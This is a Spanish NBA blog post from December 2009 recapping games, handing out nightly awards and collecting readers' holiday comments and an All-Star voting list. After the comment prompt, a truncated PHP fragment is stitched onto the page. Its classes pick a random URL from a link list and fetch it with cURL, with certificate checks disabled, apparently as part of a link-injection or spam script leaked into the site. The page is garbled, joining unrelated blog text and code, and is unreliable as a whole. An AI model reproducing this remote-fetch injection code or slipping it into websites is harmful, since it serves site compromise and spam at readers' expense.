La Crónica (23/12/2009)

24 de December de 2009 por TheDeerHunter

Nos disponemos todos a cerrar el chiringuito por Navidad, a la espera de los partidazos del día 25 que nos traerá Papá Noel.

Anoche acontecieron varios batacazos reseñables (y alguno más que pudo haber), empezando por los paupérrimos 64 puntos que anotó Detroit contra la “titánica” defensa de los Raptors (que de titánica tiene lo que yo te diga, por si no se había notado la ironía…). Villanueva tenía ganas de repartir amor típico de las fechas porque otra cosa, nada…

La mayor sorpresa de la noche, la gran noticia para nuestros maltrechos fans de los Blazers. Sin Roy ni, obviamente, la legión de lesionados, McMillan encontró la manera de sorprender a Popovich y los Spurs en el mismísimo Alamo. Una mejora la tenía en su misma cara. Se llama Bayless. Desde que está empezando a darle más bola (y algo menos a Blake) el chaval la está literalmente armando cada poco. Después está Juwan Howard… que bueno, era el viejo “Fab Five” y cuánto hacía que no nos acordábamos ya de eso. Brindemos por ello y punto positivo para McMalon. Por su parte los Spurs huelen a lo mismo que los Pistons del año pasado (y con el mejor Duncan en mucho tiempo, ojo). En cualquier caso no seré yo el imprudente que los entierre.

Lo comentábamos hace poco y los Thunder le dieron en la cara a los Suns a domicilio, para más inri. La superioridad interior local fue contrarrestada por un inconmensurable Durant bien apoyado en Westbrook, Harden e Ibaka. Noche aciaga para Grant Hill que terminó expulsado tratando desesperadamente de defender a su par. Antaño era el 33 de Duke quien inflingía los castigos.

Pero LeBron también estuvo a un pelo de tropezar en Sacramento. Jugó muy bien, sí, firmando triple doble, pero necesitó del mejor Ilgauskas de la temporada, a un muy buen Mo Williams y de una prórroga para doblegar a unos Kings muy bien armados (excepto en la propia prórroga que no mojaron ni un punto). No tuvieron tantos problemas los Magic para doblegar a unos flojos Rockets, pero sí los tuvieron los Hawks, llevándose un severo correctivo de su visita a Denver. JR Smith los infló a triples (10 de 17, ufff). Por su parte, los Heat mantuvieron el tipo ganando a unos flojísimos Jazz… y eso que ellos tampoco es que estuvieran para tirar cohetes. Decidió Wade.

Los Wizards se dieron un susto morrocotudo con la rodilla de Arenas. No terminó el partido y veremos en las próximas fechas, pero Boykins sacó las castañas del fuego. Volvió Redd a la titularidad por Milwaukee y Jennings no lo terminó de digerir demasiado bien. Su peor actuación desde que ha llegado a la liga.

Finalmente los Hornets batieron a los Warriors (7 derrotas seguidas) y los Wolves a los Nets.

Felices fiestas, blogueros…

PREMIOS:

MVP: LeBron hizo un triple doble de, ni más ni menos, 34 puntos, 16 rebotes y 10 asistencias y por su parte Durant destrozó a los Suns… Pero el protagonista indiscutible de la jornada es JR Smith con sus 10 triples para 41 puntos.

El Rookie: Podríamos destacar a Tyreke como casi todos los días. Sin embargo, con el plus de la victoria, hoy lo merece más Jonny Flynn con sus 22 puntos, 5 asistencias y 4 robos.

La sorpresa: Jerryd Bayless destrozó a un buen defensor como Keith Bogans. 31 puntos y 7 asistencias que los Spurs no pudieron contrarrestar.

La decepción: Detroit en global y Villanueva en particular. La apuesta de Dumars en él no contaba con partidos de rosco navideño como el de anoche. Y ahora no tiene al chino para culparle de sus desgracias.

El mayor esfuerzo en vano: Stat, 35 puntos, 14 rebotes… Menudo palo perder un partido así.

RAZONES PARA TRASNOCHAR:

Como mucho pillar a Santa con las manos en la masa… Cada uno tendremos que buscar nuestras propias razones esta noche.

Sed buenos.

Comenta

13 comentarios a esta entrada

  1. David dice:
    #1

    Felices fiestas (y todo este tipo de cosas que se dicen por estas fechas) para toda la comunidad TJNBA!
    Un saludo de un lector habitual

      Citar

  2. Hynreck dice:
    #2

    Tremendo, los Soprano copamos hoy el MVP, el Rookie y la sorpresa de la jornada, se atisban tiempos de gloria en el horizonte… 😛

    Felices fiestas!!!

      Citar

  3. sergio dice:
    #3

    Cada dia que pasa veo a Lakers y Boston mas alejados del resto. Espero que este año que empieza nos traiga mas competitividad y equilibrio.
    Si los Nets ya no le ganan ni siquiera a Minnesota se convertiran en el peor equipo de la historia durante una regular… tiempo al tiempo.
    Yo que tanta caña le doy a McMillan he de reconocer que esta encontrando soluciones para sobreponerse a todos los infortunios que esta recibiendo. Me quitare el sombrero durante un pequeño espacio de tiempo. Eso si, mis dudas venian de sacar provecho a toda la plantilla eee… que ya se que me vais a saltar!!

    Felices fiesta gente!

      Citar

  4. Lagarto dice:
    #4

    Feliz Navidad a todos y a esperar el Lakers-Cleveland de mañana.
    Un saludo.
    Lagarto.

      Citar

  5. Txusma dice:
    #5

    Que manda narices! El partido es a la 1h00 hora española y Cuatro lo empieza retransmitir a las 3h30!! Casi mola más ese Boston-Orlando a las 10h30…

    Felices fiestas!

      Citar

  6. Love Denise dice:
    #6

    Creo que a los Pistons no se les puede pedir más, ya de por sí estaban en decadencia, y encima con las ausencias de Gordon, Hamilton y Prince. Pienso que su situación en la tabla es comprensible.

    Tremendo los 10 triples de J.R. Smith, y va el tío y hace un 1 de 6 en tiros libres.
    Para cuando vuelven Calderón y Rudy? Gracias.

    Felices Fiestas a todo el equipo de TJNBA y a todos sus lectores.

      Citar

  7. PIRATA dice:
    #7

    Felices fiestas a todos de un fan incondicional!!!!!!!!!!!!!!!!!!!!!1

      Citar

  8. Tobal dice:
    #8

    Felices Navidades para todos,incluyendo a todo el equipo que realiza este estupendo Blog de la NBA.

      Citar

  9. M dice:
    #9

    Feliz Navidad!!

      Citar

  10. Óscar dice:
    #10

    Bien sacado ese sombrero, Sergio.
    Ni siquiera yo podía esperar estar con 19-12 con tantas bajas y mala suerte. Este equipo de Portland tiene algo especial, más allá del mal fario (demasiado especial) y de “McMallon” (apellido irlandés por cierto). Se habrá inspirado en su trono, estilo Phil Jackson… con su pie inmovilizado.
    Sinceramente tiene mucho mérito, pero la temporada es larga y los lesionados no van a volver pronto. Lo ha hecho Pendergraph vs. SAS y ha jugado bien. Como mucho lo harán en unas semanas Rudy y “Paddy” Mills, al que tengo muchas ganas de ver. El problema: son jugadores de perímetro. Por dentro es un escándalo, con Juwan haciendo lo que puede y titular en un equipo fuerte… quién se lo iba a decir.
    Viendo a los mojones de los que habláis y tal como está el mercado, yo no haría ningún movimiento, aunque parezca una locura. Tiraría con lo que hay dejando que se desarrollen jugadores de 1º ó 2º año como Cunningham, Pendergraph, Mills, Bayless, Rudy, y esperando que vuelvan a tiempo los Batum y Outlaw, allá por marzo. La idea: aprovechar la temporada para crecer como equipo y competir al máximo el año que viene. Una temporada como esta es irrepetible en cuanto a la mala suerte… espero.

    Hala, a preparar todo que viene la family de nuevo… Qué coñazo de fiestas.

      Citar

  11. kantonyo dice:
    #11

    Felices Fiestas a todos!!!!

      Citar

  12. TheDeerHunter dice:
    #12

    quintetos all-star provisionales:

    WEST:
    Kobe primero de todas las votaciones con casi 1,400K
    se cae T-Mac (3er guard todavía con 500K votos): Nash, Kobe, Melo, Dirk y Stat (en ese sentido no hay mucho que objetar, bajo mi punto de vista.
    Si el entrenador de turno les hace mínimo caso a las votaciones también podrían ir Bynum, Gasol, Duncan, Durant, quizás Ariza, CP3, Kidd… y quizás Brooks o Billups.
    No tiene nombre lo de Deron o Roy, pero bueno. Creo que deberían ir ambos… pero habría que quitar a Kidd y Brooks, entiendo.

    EAST:
    LeBron recupera el trono con 1,300K.
    Quinteto, ojo… Iverson, Wade, LeBron, Garnett y Howard.
    Injusto, además de lo de AI, lo de los Raptors tan altos (Bosh y Bargnani) y los Hawks tan bajos (Smith, Johnson y Horford)
    Para mí el base titular debería ser Rondo. Pero va a ser que no. Posiblemente ni vaya.

      Citar

  13. Vader dice:
    #13

    Felices fiestas de otro fan del blog!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>